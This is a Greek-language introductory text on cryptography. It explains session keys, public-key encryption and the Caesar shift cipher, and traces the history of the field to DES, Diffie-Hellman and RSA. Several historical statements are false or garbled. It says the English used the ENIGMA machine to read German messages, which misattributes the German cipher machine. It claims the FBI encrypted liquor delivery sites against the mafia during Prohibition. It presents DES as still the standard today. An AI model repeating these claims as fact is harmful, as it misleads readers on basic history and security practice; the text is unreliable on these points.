Η συμβατική κρυπτογράφηση και η κρυπτογράφηση δημόσιου κλειδιού συχνά συνδυάζονται σε εφαρμογές ασφαλούς διαδικτύωσης. Η συμβατική κρυπτογράφηση χρησιμοποιείται για να κρυπτογραφεί δεδομένα, χρησιμοποιώντας ένα μίας χρήσης ή μικρής διάρκειας κλειδί συνόδου (session key). Το κλειδί συνόδου μπορεί να διανεμηθεί από ένα έμπιστο κέντρο διανομής κλειδιού ή να μεταδοθεί σε κρυπτογραφημένη μορφή χρησιμοποιώντας κρυπτογράφηση δημόσιου κλειδιού. Η κρυπτογράφηση δημόσιου κλειδιού διαθέτει την επιπλέον δυνατότητα να δημιουργεί ψηφιακές υπογραφές, οι οποίες μπορούν να πιστοποιήσουν την πηγή των μεταδομένων μηνυμάτων.

Κρυπτογραφία

Η λέξη κρυπτολογία αποτελείται από την ελληνική λέξη κρύπτο – κρυφός και την λέξη λόγος. Είναι ο τομέας που ασχολείται με την μελέτη της ασφαλούς επικοινωνίας. Ο κύριος στόχος είναι να παρέχει μηχανισμούς για 2 ή περισσότερα μέλη να επικοινωνήσουν χωρίς κάποιος άλλος να είναι ικανός να διαβάζει την πληροφορία εκτός από τα μέλη.

Ιστορική αναδρομή κρυπτογραφίας

Η κρυπτογραφία είχε αρχικά την μορφή τέχνης που τα μυστικά της γνώριζαν λίγοι και εκλεκτοί. Η ιστορία της κρυπτογραφίας ξεκινά περίπου το 4000 π.Χ. στην αρχαία Αίγυπτο περνά στην αρχαία Ελλάδα που έχουμε αναφορές της στο ιστορικό Πολύβιο και συνεχίζεται στον Ιούλιο Καίσαρα. Ο Ιούλιος Καίσαρας επινόησε έναν απλό κρυπτογραφικό αλγόριθμο για να επικοινωνεί με τους επιτελείς του, με μηνύματα που δεν θα ήταν δυνατόν να τα διαβάσουν οι εχθροί του. Ο αλγόριθμος βασιζόταν στην αντικατάσταση κάθε γράμματος του αλφαβήτου με κάποιο άλλο, όχι όμως τυχαία επιλεγμένο. Ο αλγόριθμος κρυπτογράφησης είναι η ολίσθηση των γραμμάτων του αλφαβήτου προς τα δεξιά. Κάθε γράμμα αντικαθίσταται από κάποιο άλλο με κάποιο κλειδί π.χ. 3. ∆ηλαδή, η κρυπτογράφηση ενός μηνύματος γίνεται με αντικατάσταση κάθε γράμματος από το γράμμα που βρίσκεται 3 θέσεις δεξιότερά του στο αλφάβητο. Θα μπορούσε το κλειδί να ήταν ο αριθμός 6, οπότε το κρυπτογραφημένο κείμενο που θα προέκυπτε θα ήταν διαφορετικό. Έτσι, διατηρώντας τον ίδιο αλγόριθμο κρυπτογράφησης και επιλέγοντας διαφορετικό κλειδί παράγονται διαφορετικά κρυπτογραφημένα μηνύματα.

Από την στιγμή που η κρυπτογραφία άρχισε να χρησιμοποιείται για στρατιωτικούς σκοπούς και για απόκρυψη ζωτικής σημασίας πληροφοριών, έπαψε να είναι απόκρυφη τέχνη και έτυχε της μελέτης τόσο αυτών που ήθελαν να αποκρύψουν τα μυστικά τους όσο και από αυτούς που ήθελαν να βρουν τρόπο να αποκαλύψουν τα μυστικά των αντιπάλων τους. Έτσι η κρυπτογραφία πέρασε στο πεδίο της επιστήμης.
Κρυπτογράφοι και κρυπταναλυτές επιδόθηκαν σε έναν ανελέητο συναγωνισμό. Κάθε πρόοδος της κρυπτογραφίας συνοδευόταν από μια αντίστοιχη πρόοδο της κρυπτανάλυσης. Η κρυπτογραφία έγινε χρήσιμο εργαλείο στα χέρια του στρατού των διπλωματών και του κράτους με σκοπό την διαφύλαξη εθνικών μυστικών και στρατηγικών. Όσο πιο πολύτιμα τα μυστικά τόσο πιο μεγάλη αξία αποκτούσε η ασφαλής φύλαξή τους. Στον 20ό αιώνα τα παραδείγματα εκτεταμένης χρήσης κρυπτογραφικών τεχνικών είναι πολλά.
Την περίοδο της ποτοαπαγόρευσης στην Αμερική (δεκαετία του 20-30) το νεοσύστατο τότε σώμα FBI χρησιμοποίησε τεχνικές κρυπτογραφίας για να αποκρύπτει από τη μαφία τους τόπους παράδοσης μεγάλων φορτίων ποτών.
∆εν θα ήταν υπερβολή να πούμε ότι η έκβαση του δευτέρου Παγκοσμίου Πολέμου κρίθηκε υπέρ των συμμάχων εξαιτίας της ικανότητας τους να αποκρυπτογραφούν τα γερμανικά μηνύματα και της ανικανότητας των Γερμανών να πράξουν κάτι ανάλογο με τα συμμαχικά μηνύματα. Είναι γνωστή άλλωστε η ιστορία της μηχανής ENIGMA που χρησιμοποίησαν οι Άγγλοι για να αποκρυπτογραφούν τα μηνύματα του Γερμανικού επιτελείου προς τις αγέλες των υποβρυχίων τους στη Μεσόγειο αλλά και τον Ατλαντικό ωκεανό.
Από την δεκαετία του 60 και μετά η κρυπτογραφία γνώρισε μεγάλη ανάπτυξη λόγω της ραγδαίας ανάπτυξης των υπολογιστών, αλλά και των τηλεπικοινωνιών. Έτσι λοιπόν, υπήρξε η ανάγκη για προστασία δεδομένων σε ψηφιακή μορφή. Αρχίζοντας με την εργασία του Feistel στην IBM στις αρχές της δεκαετίας του '70 και καταλήγοντας το 1977 με την υιοθέτηση του Αμερικανικού ομοσπονδιακού προτύπου για την επεξεργασία των πληροφοριών την κρυπτογράφηση των μη-διαβαθμισμένων πληροφοριών, τον αλγόριθμο DES. Παραμένει μέχρι σήμερα το τυποποιημένο μέσο για την ασφάλεια του ηλεκτρονικού εμπορίου σε πολλά οικονομικά ιδρύματα σε όλο τον κόσμο. Η πιο εντυπωσιακή ανάπτυξη στην ιστορία της κρυπτογραφίας ήρθε το 1976 όταν ο Diffie και ο Hellman δημοσίευσαν το “New directions in cryptography”. Αυτή η επιστημονική δημοσίευση εισήγαγε την επαναστατική έννοια τής κρυπτογραφίας δημοσίου κλειδιού. Παρόλο που οι συγγραφείς δεν έκαναν πρακτική εφαρμογή του σχήματος που πρότειναν, η αρχή είχε γίνει και το θέμα έτυχε μεγάλου ενδιαφέροντος από την κρυπτογραφική κοινότητα.
Το 1978 οι Rivest, Shamir και Adleman ανακάλυψαν την πρώτη πρακτική εφαρμογή του προταθέντος σχήματος. Ήταν το λεγόμενο σχήμα RSA και βασιζόταν σε ένα άλλο δύσκολο μαθηματικό πρόβλημα, αυτό της δυσκολίας παραγοντοποίησης μεγάλων ακεραίων. Όπως ήταν φυσικό οι κρυπταναλυτές σήκωσαν τα μανίκια και άρχισαν να ψάχνουν πιο αποτελεσματικούς τρόπους παραγοντοποίησης. Παρά τις μεγάλες προόδους τους κυρίως την δεκαετία του 80 το RSA παρέμεινε ακόμα ασφαλές! Μια από τις σημαντικότερες προσφορές της κρυπτογραφίας δημοσίου κλειδιού ήταν και η ψηφιακή υπογραφή.